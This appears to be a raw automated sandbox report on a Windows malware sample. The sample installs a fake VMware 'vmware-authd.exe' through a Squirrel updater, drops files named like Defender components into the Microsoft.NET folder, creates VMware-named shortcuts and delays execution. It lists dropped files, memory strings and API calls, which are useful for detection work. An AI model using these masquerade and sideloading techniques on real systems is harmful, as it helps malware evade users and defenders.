Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpRes.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpOAV.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetours.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpSvc.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpProvider.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCommu.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpClient.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\shellext.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\NisSrv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-40862

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

API coverage: 2.3 %

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 5352	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 5764	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00FA5564 FindFirstFileExW,		0_2_00FA5564
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E10E976 FindFirstFileExW,		4_2_6E10E976

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe

Code function: 0_2_00F99ED6 VirtualQuery,GetSystemInfo,

0_2_00F99ED6

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineQuery_VMCI
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sers\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $/vmware-authd.exe
Source: Update.exe, 00000003.00000002.2062592570.000000000324D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: LIB/NET48/VMWAREBASE.DLL
Source: vmware-authd.exe.3.dr	Binary or memory string: http://www.vmware.com/0
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_HGFSSetWriteAccess
Source: Update.exe, 00000003.00000002.2064689456.000000001BA00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com.squirrel.DefMeta.vmware-authdQ
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exed
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Workstation.lnk
Source: vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_VMCISetUnrestricted@@YGHXZ
Source: Update.exe, 00000003.00000002.2064689456.000000001B9F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: file:///C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exe(A
Source: vmware-authd.exe.3.dr	Binary or memory string: name="VMware.VMware.vmauthd"
Source: Update.exe, 00000003.00000002.2062592570.000000000304D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: LAbout to create shortcuts for vmware-authd.exe, rootAppDir C:\Users\user\A
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0rs\user\Desktop\VMware Workstation.lnk
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_HGFSPurge
Source: vmware-authd.exe, 00000008.00000002.3263091725.0000000003020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_DetectorsTrace_vmware-authd.exe_7208.txt
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkx.%
Source: Update.exe, 00000003.00000002.2064689456.000000001BA22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\VMware Workstation.lnk
Source: Update.exe, 00000003.00000002.2062592570.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rkstation.lnk (target C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe, workingDir C:\Users\user\AppData\Local\DefMeta\app-1.0.0, args , toastActivatorCSLID 42308fda-ab09-5018-a5bc-4c64b70949ed)
Source: Update.exe, 00000003.00000002.2064689456.000000001BA00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ..\..\..\..\..\..\Local\DefMeta\vmware-authd.exe
Source: vmwarebase.dll.3.dr	Binary or memory string: ?AsyncSocket_ListenVMCI@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware-authd.exea
Source: vmware-authd.exe.3.dr	Binary or memory string: noreply@vmware.com0
Source: Update.exe, 00000003.00000002.2062592570.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lib/net48/vmwarebase.dllu
Source: vmware-authd.exe.3.dr	Binary or memory string: vmware
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_HGFSSetWriteAccess@@YGHXZ
Source: Squirrel-Install.log.3.dr	Binary or memory string: [16/02/24 14:29:58] info: ApplyReleasesImpl: Creating shortcut for vmware-authd.exe => C:\Users\user\Desktop\VMware Workstation.lnk
Source: vmware-authd.exe, 00000008.00000002.3263091725.0000000003020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_ShimDebugLog_vmware-authd.exe_7208.txt
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Workstationp^!
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_HGFSSetEnabled@@YGHXZ
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: s\AppData\Local\DefMeta\vmware-authd.exe, workingDir C:\Users\user\AppData\Local\DefMeta\app-1.0.0, args , toastActivatorCSLID 42308fda-ab09-5018-a5bc
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: file:///C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exez"p
Source: vmware-authd.exe, 00000008.00000002.3263091725.000000000302E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware-authd.exeL
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DCan't write shortcut: C:\Users\user\Desktop\VMware Workstation.lnkx.%
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: .C:\Users\user\Desktop\VMware Workstation.lnk
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_HGFSSetFollowSymlinks@@YGHXZ
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0Creating shortcut for vmware-authd.exe => C:\Use
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_HGFSSetTags@@YGHXZ
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 6C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\SysWOW64\Bcp47Langs.dllta\app-1.0.0\vmware-authd.exe
Source: vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineQuery_VMCI@@YGHXZ
Source: Update.exe, 00000003.00000002.2064689456.000000001BA00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com.squirrel.DefMeta.vmware-authd
Source: Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 2http://defaultcontainer/lib/net48/vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_HGFSSetFollowSymlinks
Source: vmware-authd.exe, 00000008.00000002.3263091725.00000000030B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware-authd.exet
Source: VMware Workstation.lnk0.3.dr	Binary or memory string: "com.squirrel.DefMeta.vmware-authd
Source: vmwarebase.dll.3.dr	Binary or memory string: ?W32Util_GetVmwareCommonAppDataFilePath@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: file:///C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exeX"p
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ApplyReleasesImpl: Creating shortcut for vmware-authd.exe => C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk2!
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_HGFSPurge@@YGHXZ
Source: Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /lib/net48/vmware-authd.exeu
Source: VMware Workstation.lnk0.3.dr	Binary or memory string: %USERPROFILE%\AppData\Local\DefMeta\vmware-authd.exe%USERPROFILE%\AppData\Local\DefMeta\vmware-authd.exe
Source: vmware-authd.exe.3.dr	Binary or memory string: File_CreateDirectoryvmwarebase.DLL)_strdup
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $/vmware-authd
Source: vmware-authd.exe.3.dr	Binary or memory string: security.host.ruisslvmwareauthd.policy.allowRCForReadvmauthd.startupTimeoutgetpeername failed: %d tid %d
Source: vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_VMCISetFiltering
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_HGFSSetEnabled
Source: vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_QueryVMCI@@YGHXZ
Source: Squirrel-Install.log.3.dr	Binary or memory string: [16/02/24 14:29:58] info: ApplyReleasesImpl: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe, workingDir C:\Users\user\AppData\Local\DefMeta\app-1.0.0, args , toastActivatorCSLID 42308fda-ab09-5018-a5bc-4c64b70949ed)
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_HGFSSetWriteAccess@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $/vmware
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?HgfsEscape_Do@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_HGFSSetReadAccess
Source: vmware-authd.exe.3.dr	Binary or memory string: VMware
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: RC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.
Source: vmware-authd.exe.3.dr	Binary or memory string: <description>"VMware Authorization Service"</description>
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: >C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmwarebase.dll
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_HGFSSetReadAccess@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3263231070.0000000002980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_ShimDebugLog_vmware-authd.exe_5456.txt
Source: Update.exe, 00000003.00000002.2064689456.000000001BA22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exe3
Source: vmware-authd.exe.3.dr	Binary or memory string: vmware-vmx.exe%s%c..%c%svmware-vmx-debug.exevmware-vmx-stats.exeNo ticket found
Source: vmware-authd.exe.3.dr	Binary or memory string: VMware, Inc.1!0
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Can't write shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnkx.%
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exe8
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe.
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_HGFSSetFollowSymlinks@@YGHXZ
Source: vmware-authd.exe, 00000008.00000003.2108854598.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2112499057.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000002.3263091725.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2117689030.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120322191.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000002.3263091725.000000000304D000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121078090.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121275803.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2117823557.000000000304C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe@
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exedY
Source: vmware-authd.exe.3.dr	Binary or memory string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb--
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_HGFSSetPresent@@YGHXZ
Source: Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /lib/net48/vmwarebase.dll
Source: vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_VMCISetID@@YGHXZ
Source: vmware-authd.exe, 00000008.00000002.3263091725.000000000302E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume3\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe(
Source: vmware-authd.exe.3.dr	Binary or memory string: vmwarebase.DLL
Source: Update.exe, 00000003.00000002.2062592570.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: sApplyReleasesImpl: About to create shortcuts for vmware-authd.exe, rootAppDir C:\Users\user\AppData\Local\DefMeta2!
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: HgfsEscape_GetSize
Source: vmware-authd.exe, 00000008.00000002.3263091725.00000000030B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware-authd.exeindows
Source: vmware-authd.exe, 00000008.00000002.3263091725.000000000302E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmwarebase.DLL
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware-authd
Source: Squirrel-Install.log.3.dr	Binary or memory string: [16/02/24 14:29:58] info: ApplyReleasesImpl: About to create shortcuts for vmware-authd.exe, rootAppDir C:\Users\user\AppData\Local\DefMeta
Source: Update.exe, 00000003.00000002.2064689456.000000001BA22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exe^
Source: Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /LIB/NET48/VMWAREBASE.DLL
Source: Update.exe, 00000003.00000002.2062592570.0000000003202000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exehN
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: HgfsEscape_Do
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_HGFSSetReadAccess
Source: ProtectionManagement.dll.8.dr	Binary or memory string: VMwareVMware
Source: ProtectionManagement.mof.8.dr	Binary or memory string: [read : ToSubclass] boolean IsVirtualMachine = FALSE;
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
Source: vmwarebase.dll.3.dr	Binary or memory string: AsyncSocket_ConnectVMCI
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?HgfsEscape_GetSize@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exeN
Source: Update.exe, 00000003.00000002.2064689456.000000001BA22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exeI
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwarebase.dll
